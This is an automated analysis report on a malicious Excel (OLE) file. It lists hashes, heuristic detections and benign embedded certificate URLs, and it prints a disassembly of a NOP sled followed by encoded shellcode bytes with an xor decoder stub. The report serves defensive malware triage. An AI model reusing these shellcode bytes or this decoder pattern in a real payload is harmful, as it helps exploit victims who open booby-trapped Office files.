Office (OLE) / .XLS malware analysis — malicious · 75106724a047a406

MALICIOUS

Office (OLE) / .XLS

79.5 KB First seen: 2026-05-11

MD5: b5a182ee021da3e57f50f515c116baa2 SHA-1: eaa40c440058974203dbed6e3037039e4243bb8a SHA-256: 75106724a047a406799bea2166464ab299bce703e44e216e2c449fe5267d693d

64 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution

The sample is identified as malicious and contains a NOP sled, indicating a potential exploit. While VBA macros could not be extracted due to an unsupported format, the presence of embedded URLs and the overall structure suggest an attempt to execute malicious code. The file's structure and heuristic firings point towards an exploit targeting client execution, likely to download further stages.

Heuristics 4

NOP sled detected high SC_NOP_SLED

Found 20+ consecutive 0x90 bytes

Disassembly

Attempted x86 opcode disassembly

00013408  90                nop
00013409  90                nop
0001340A  90                nop
0001340B  90                nop
0001340C  90                nop
0001340D  90                nop
0001340E  90                nop
0001340F  90                nop
00013410  90                nop
00013411  90                nop
00013412  90                nop
00013413  90                nop
00013414  90                nop
00013415  90                nop
00013416  90                nop
00013417  90                nop
00013418  90                nop
00013419  90                nop
0001341A  90                nop
0001341B  90                nop
0001341C  dbdf              fcmovnu st(0), st(7)
0001341E  d97424f4          fnstenv [esp - 0xc]
00013422  58                pop eax
00013423  2bc9              sub ecx, ecx
00013425  b133              mov cl, 0x33
00013427  ba4ca87576        mov edx, 0x7675a84c
0001342C  83c004            add eax, 4
0001342F  315013            xor dword ptr [eax + 0x13], edx
00013432  031cbb            add ebx, dword ptr [ebx + edi*4]
00013435  97                xchg edi, eax
00013436  836053de          and dword ptr [eax + 0x53], 0xffffffde
0001343A  6c                insb byte ptr es:[edi], dx
0001343B  98                cwde
0001343C  a4                movsb byte ptr es:[edi], byte ptr [esi]
0001343D  81e57d959392      and ebp, 0x9293957d
00013443  f68423d05a25cfb4  test byte ptr [ebx - 0x30daa530], 0xb4
0001344B  4e                dec esi
0001344C  bebd106177        mov esi, 0x776110bd
00013451  0b474c            or eax, dword ptr [edi + 0x4c]
00013454  88bd47024adf      mov byte ptr [ebp - 0x20b5fdb9], bh
0001345A  3b589f            cmp ebx, dword ptr [eax - 0x61]
0001345D  3f                aas
0001345E  0593d23e42        add eax, 0x423ed293
00013463  c9                leave
00013464  1d                .byte 0x1d
00013465  121b              adc bl, byte ptr [ebx]
00013467  86                .byte 0x86

CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS

The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Unsupported Office format for VBA extraction info OFFICE_FORMAT_UNSUPPORTED

The Analyzer could not extract VBA macros: the document may be legacy, encrypted or malformed.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.microsoft.com In document text (OLE body)
- https://www.verisign.com/rpaIn document text (OLE body)
- http://ocsp.verisign.com/ocsp/status0In document text (OLE body)
- https://www.verisign.com/rpa0In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/CodeSignPCA.crl0In document text (OLE body)

Open this report in the interactive analyzer, or submit your own file for analysis.